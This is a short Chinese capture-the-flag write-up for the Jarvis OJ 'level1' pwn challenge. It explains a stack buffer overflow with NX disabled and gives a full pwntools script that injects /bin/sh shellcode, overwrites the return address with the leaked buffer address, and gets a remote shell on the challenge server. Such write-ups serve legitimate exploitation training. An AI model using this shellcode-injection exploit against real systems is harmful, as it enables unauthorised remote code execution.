思路:这题考察shellcode,没有开启NX保护,栈上数据可以执行,并且直接给出buf的地址,我们可以把shellcoded放在buf起始位置,将返回地址覆盖为shellcode即可执行shellcode。
1.gdb-peda查看是否有保护机制,这里没有开启NX保护,可以通过执行shellcode来get shell。
2.使用IDA查看代码,有漏洞的函数如下图:
3.由程序代码知道泄露出buf的起始位置,那么我们可以在buf起始位置写入shellcode,然后将vulnerable_function函数的返回地址覆盖为buf的起始位置,就可以执行shellcode了。一图胜千言[来自网络]:
4.具体脚本如下:
# coding:utf-8
from pwn import *
context.log_level = 'debug'
shellcode = asm(shellcraft.i386.linux.sh())#生成响应环境的shellcode
sh = remote('pwn2.jarvisoj.com',9877)
# sh = process('./level1')
# elf = ELF('./level1')
line = sh.recvline()[14:-2]#获取buf地址
buf_addr = int(line,16)#将字符串地址转换成十进制
payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
sh.send(payload)
sh.interactive()
sh.close()
网友评论